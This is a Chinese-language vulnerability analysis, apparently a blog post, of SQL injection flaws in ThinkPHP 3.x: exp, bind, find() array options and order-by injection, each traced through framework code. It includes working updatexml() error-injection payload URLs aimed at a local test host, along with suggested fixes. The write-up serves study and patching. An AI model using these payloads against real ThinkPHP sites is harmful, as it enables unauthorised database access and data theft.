ThinkPHP3.x注入漏洞分析
exp表达式报错注入
此漏洞是由exp引起的报错注入,我们在控制器中写入一个段传参代码
// $username = I("username");
$username = $_GET["username"];
$data = M("user")-> where(array("username"=>$username))->find();
dump($data);
这里的控制路由是http://www.myapp.com/index.php/home/index?username=admin
,正常访问
data:image/s3,"s3://crabby-images/c93f1/c93f16f88bc927efeb1fba876aeb506105f74ff2" alt="img"
当我们这里写入不规范的时候,就会造成报错注入。我们下面使用断点调试来进行演示。
分析内核语句执行过程
data:image/s3,"s3://crabby-images/3c63f/3c63fd38be869f77b83a4919a1fb8d1c013d0f4a" alt="img"
上面写的代码可以看到,我们是以where进行赋值的。
data:image/s3,"s3://crabby-images/c5b99/c5b998f6f825fffcc6b9974c70393aeb7f9b43c8" alt="img"
这个M用的就是model类,建了一个user_Think\Model
data:image/s3,"s3://crabby-images/aa152/aa152d88076d022c42ca5233073da497c210b312" alt="img"
这里的where就是一个赋值
data:image/s3,"s3://crabby-images/7caa9/7caa9b6f1a2de55ef4e562caf4f61c0c87cbc7d6" alt="img"
data:image/s3,"s3://crabby-images/3686b/3686b98ef98f454407e665affca2b36d3258c0e4" alt="img"
条件判断的,limit就是等于1
data:image/s3,"s3://crabby-images/923d3/923d3268a737ecf534f47069d7dc2598f6e69d58" alt="img"
这里创建SQL语句。
data:image/s3,"s3://crabby-images/0e90d/0e90dabd17a44e258be49c7a5721d26c220bcec3" alt="img"
data:image/s3,"s3://crabby-images/7af7d/7af7dcd8562ea115cf32a2f3a1020e27402aba5d" alt="img"
到这里就是我们用的where了
data:image/s3,"s3://crabby-images/5cd5a/5cd5a9a4ce9417440f8cb35df817061d13f0d9ba" alt="img"
这里是判断是否匹配正则表达式。
data:image/s3,"s3://crabby-images/41122/41122c82ffebdc75eb73f719c7c01d9463893484" alt="img"
所有东西都是在这里进行过滤的。
data:image/s3,"s3://crabby-images/09bf3/09bf3c66b1f2ea4dccbd644e2c1660576faa502f" alt="img"
这里SQL语句就执行出来了。
data:image/s3,"s3://crabby-images/7c8f3/7c8f399ab6e96cb6418a4fc60ee5c5c70d226e35" alt="img"
这里后面就是输出结果了。
data:image/s3,"s3://crabby-images/0e56a/0e56a1e026f391c56122c757c2220b99e0e7075e" alt="img"
protected function parseValue($value) {
if(is_string($value)) {
$value = strpos($value,':') === 0 && in_array($value,array_keys($this->bind))? $this->escapeString($value) : '\''.$this->escapeString($value).'\'';
}elseif(isset($value[0]) && is_string($value[0]) && strtolower($value[0]) == 'exp'){
$value = $this->escapeString($value[1]);
}elseif(is_array($value)) {
$value = array_map(array($this, 'parseValue'),$value);
}elseif(is_bool($value)){
$value = $value ? '1' : '0';
}elseif(is_null($value)){
$value = 'null';
}
return $value;
}
这段代码过滤一些字符,会加上\
漏洞分析
漏洞payloadhttp://www.myapp.com/index.php/home/index?username[0]=exp&username[1]==%27admin%27
data:image/s3,"s3://crabby-images/a6207/a620721d41ea96ccc666bb58dfb5de3d15df0c90" alt="img"
这里我们发现username变成了数组。
data:image/s3,"s3://crabby-images/d1b60/d1b60f437f6a59530a7ae7849cceb4aaddcb2cbb" alt="img"
这里赋值username数组的1='admin'了。这个时候过滤的函数就不起作用了。
data:image/s3,"s3://crabby-images/186bd/186bd60c52011b24bc73ff4ee8afa7385518e4bf" alt="img"
这里也可以看到,对数组进行字段类型检查。
data:image/s3,"s3://crabby-images/e80fe/e80fe42d503117afae0fdfde65822758805404cf" alt="img"
这里就没有过滤了已经。在这里之前,username这个数组的值变成了$exp.='admin'。
data:image/s3,"s3://crabby-images/344e9/344e95e486c53f7c8dec74ab18947999afba15ea" alt="img"
到这里已经出来了SQL语句,这里可以看到当username等于'admin',我们这个时候就可以对这里进行一个报错注入了。
我们在后面再加一个单引号,看是否报错,查看一下SQL语句。
data:image/s3,"s3://crabby-images/c68c4/c68c475f3f99608fbb60faf041f4a93ccfd95e58" alt="img"
可以看到,这里admin后面,有两个单引号,同时页面已经报错。
data:image/s3,"s3://crabby-images/a7052/a7052c49ca313f0128a291f93abc0112f374412b" alt="img"
我们使用报错语句,对数据库账号进行报错注入。
http://www.myapp.com/index.php/home/index?username[0]=exp&username[1]==%27admin%27 and 1= (updatexml(1,concat(0x3a,(user())),1))%23
data:image/s3,"s3://crabby-images/4300c/4300c5b255a1ae72649dc7457f8eddd71d4c11df" alt="img"
修复方式
规范代码写法,使用I函数。
data:image/s3,"s3://crabby-images/a941e/a941ed1b0d7bc2e7d9043495a67037edda173c29" alt="img"
UPDATA注入漏洞
update注入也叫bind注入。
次函数有bind表达式引起的
$condition["username"] = I("username");
$data["password"] = I("password");
$res = M("user") ->where($condition)->save($data);
dump($res);
这里如果username是数组的情况,username[1]只能是0,这样才不报错。
data:image/s3,"s3://crabby-images/7f356/7f356be8045bc4c2a51a2debe8e6cec0c20fde8a" alt="img"
这里可以看到,0后面加入特殊符号,会带报错,或者不是0也会带报错。
http://www.myapp.com/index.php/home/index/index?username[0]=bind&username[1]=0 and 1= (updatexml(1,concat(0x3a,(user())),1))%23&password=123456
data:image/s3,"s3://crabby-images/11686/116861d1948b2eeeba3035c5da07d88985a035b2" alt="img"
漏洞分析
首先还是传入的一个数组。
data:image/s3,"s3://crabby-images/534d0/534d0ab0bd396507381d7b72298c55caca2b6c80" alt="img"
这里还是安全过滤,不过这里面没有bind这个函数
data:image/s3,"s3://crabby-images/f8a96/f8a960a136bd6ebc7f8922546d1218de56333f06" alt="img"
这里还是赋值
data:image/s3,"s3://crabby-images/06f4c/06f4c88e573b7350794bc1500a6c9272a906faf1" alt="img"
这里开始更新数据
data:image/s3,"s3://crabby-images/b7b42/b7b4289252785c0d940086f3f20d92db0c104b1b" alt="img"
判断标量;整型、浮点型、字符串和布尔类型都是标量,其他都是非标量,var是字符串,是标量。
data:image/s3,"s3://crabby-images/b82c7/b82c7d7b9429a84c832ec9777f60cc704db70851" alt="img"
$name = count($this->bind);
$set[] = $this->parseKey($key).'=:'.$name;
$this->bindParam($name,$val);
data:image/s3,"s3://crabby-images/e2e1a/e2e1a9ab7eed6b60b2de05a4a967a5cb70f4e4cf" alt="img"
这里就是bind绑定的东西,值就是:0=123456
data:image/s3,"s3://crabby-images/cc77d/cc77d29df8775ac162aa66f432b7d851da364227" alt="img"
这里的SQL语句变成了UPDATE
userSET
password=:0 WHERE
username= :0 and 1= (updatexml(1,concat(0x3a,(user())),1))#
还是无法执行的。
$that = $this;
$this->queryStr = strtr($this->queryStr,array_map(function($val) use($that){ return '\''.$that->escapeString($val).'\''; },$this->bind))
data:image/s3,"s3://crabby-images/bc75f/bc75fc334578d42e8dd73511f529238e1da0ba81" alt="img"
到这里,queryStr赋值了UPDATE
userSET
password='123456' WHERE
username= '123456' and 1= (updatexml(1,concat(0x3a,(user())),1))#
后面就去执行SQL查询语句了。
修复方式
data:image/s3,"s3://crabby-images/6842f/6842f9cff4f4f9b6ec2706b7e90d783cab0e1602" alt="img"
这里的修复方式也很简单,只需要在上图标框位置添加bind过滤即可。
Find方法引起的SQL注入
$id = I("id");
$data = M("user")->find($id);
dump($data);
简介
不止是find方法,由于select(),find(),delete()方法可能会传入数组数据,导致可能的SQL注入隐患。
payload
http://www.myapp.com/index.php/home/index/index?id[table]=user where 1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23
http://www.myapp.com/index.php/home/index/index?id[alias]=user where 1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23
http://www.myapp.com/index.php/home/index/index?id[where]=1 and updatexml(1,concat(0x7e,user(),0x7e),1)--
data:image/s3,"s3://crabby-images/82ea5/82ea5983da6e7001992e7f4d74ee19c8e6347a02" alt="img"
data:image/s3,"s3://crabby-images/e75fe/e75febe22abb0263889d859d898e533b49e9e81e" alt="img"
data:image/s3,"s3://crabby-images/5c0f0/5c0f0715b98c7699f5fd8b930547966225b41bb5" alt="img"
漏洞分析
首先接入的传参id是一个数组。
data:image/s3,"s3://crabby-images/67161/67161fe5e2ef616e7ef66c215af113aaaa1e2796" alt="img"
我们的id是一个数组,到这里options同样也是一个数组
data:image/s3,"s3://crabby-images/e331f/e331fdd9070a8e65dfe2e997f04c82e7b514912f" alt="img"
这里开始准备获取数据
data:image/s3,"s3://crabby-images/5684f/5684f2ecd69ec6a7355443edff845bb2813b7b3b" alt="img"
这个时候会发现,还是没有过滤。
data:image/s3,"s3://crabby-images/c3235/c3235d368e8c69465d0e6cdf884d04e82005d45f" alt="img"
这里还是给到了下一个方法,继续跟踪
data:image/s3,"s3://crabby-images/5270d/5270df7d24d8ebe6a3c109f3700a50344a820b80" alt="img"
这里开始过滤,但是我们没有下面的这些数据,所以这里也是不会过滤的,前面都没有过滤。
data:image/s3,"s3://crabby-images/68af5/68af53165cb223457748efb46ce65fc3c3aea61d" alt="img"
我们这边跟踪到下一个返回的时候,SQL语句已经出来了,并且没有任何过滤
data:image/s3,"s3://crabby-images/e634a/e634a68760cb8779fba06b4749374ef42223ab01" alt="img"
核心漏洞代码
public function find($options=array()) {
if(is_numeric($options) || is_string($options)) {
$where[$this->getPk()] = $options;
$options = array();
$options['where'] = $where;
}
// 根据复合主键查找记录
$pk = $this->getPk();
if (is_array($options) && (count($options) > 0) && is_array($pk)) {
// 根据复合主键查询
$count = 0;
foreach (array_keys($options) as $key) {
if (is_int($key)) $count++;
}
if ($count == count($pk)) {
$i = 0;
foreach ($pk as $field) {
$where[$field] = $options[$i];
unset($options[$i++]);
}
$options['where'] = $where;
} else {
return false;
}
}
··········
public function parseSql($sql,$options=array()){
$sql = str_replace(
array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'),
array(
$this->parseTable($options['table']),
$this->parseDistinct(isset($options['distinct'])?$options['distinct']:false),
$this->parseField(!empty($options['field'])?$options['field']:'*'),
$this->parseJoin(!empty($options['join'])?$options['join']:''),
$this->parseWhere(!empty($options['where'])?$options['where']:''),
$this->parseGroup(!empty($options['group'])?$options['group']:''),
$this->parseHaving(!empty($options['having'])?$options['having']:''),
$this->parseOrder(!empty($options['order'])?$options['order']:''),
$this->parseLimit(!empty($options['limit'])?$options['limit']:''),
$this->parseUnion(!empty($options['union'])?$options['union']:''),
$this->parseLock(isset($options['lock'])?$options['lock']:false),
$this->parseComment(!empty($options['comment'])?$options['comment']:''),
$this->parseForce(!empty($options['force'])?$options['force']:'')
),$sql);
return $sql;
}
id[alias]=user where 1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23分析
表达式过滤1
此处未进行任何过滤。
data:image/s3,"s3://crabby-images/0e8ca/0e8ca20f4d7ea9bccc3ccdf37fc9c06c079257fc" alt="img"
开始生成SQL语句
data:image/s3,"s3://crabby-images/d141d/d141ddfe14c2c424d5f0f1061d6f3d6f267e66d5" alt="img"
直接执行出SQL语句。
data:image/s3,"s3://crabby-images/7431d/7431d7add0282ba416d8e63b196326551dc4c0c3" alt="img"
这种payload比上一种还要直接,只进行一次过滤,其他未执行过滤操作。
order by注入漏洞
$username = I("username");
$order = I("order");
$data = M("user")->where(array("username"=>$username))->order($order)->find();
dump($data);
paylod
http://www.myapp.com/index.php/home/index/index?username=admin&order[updatexml(1,concat(0x7e,user(),0x7e),1)]
漏洞分析
核心漏洞代码
protected function parseOrder($order) {
if(is_array($order)) {
$array = array();
foreach ($order as $key=>$val){
if(is_numeric($key)) {
$array[] = $this->parseKey($val);
}else{
$array[] = $this->parseKey($key).' '.$val;
}
}
$order = implode(',',$array);
}
return !empty($order)? ' ORDER BY '.$order:'';
}
传入传参,username是字符串,order是数组。
data:image/s3,"s3://crabby-images/76cff/76cffb3f30cbfdfff67fc3a84614729775538692" alt="img"
没有table的
data:image/s3,"s3://crabby-images/d03e3/d03e3c1f24c4d124a8e9e5a1c639849c8649843f" alt="img"
parseDistinct也没有,parseField也没有,parseJoin也没有,parseWhere有,但是只有admin没有特殊字符。
下面就是我们的关键代码了,这里判断是否是数组,判断是否是数字。是数组,不是数字,使用了一个parsekey。我们需要查看parsekey是否过滤了。
data:image/s3,"s3://crabby-images/f7c20/f7c20b4bbfd709c3a7cd59847d60825e45512e94" alt="img"
跟踪parsekey发现,这里会进行正则表达式匹配,发现不匹配,直接返回了key。
data:image/s3,"s3://crabby-images/d4a3f/d4a3f63999cf44f1e899d8c460f9e08de0043249" alt="img"
然后order直接变成了key的值,就是我们写入的恶意代码
data:image/s3,"s3://crabby-images/ae908/ae9089161d6d808e7c3f1d5d8e0b13b432544648" alt="img"
后面就没有任何处理了,直接输出了SQL语句了。
data:image/s3,"s3://crabby-images/47a9a/47a9a71869c4e4e6303a4730f4a3230bc9f961ec" alt="img"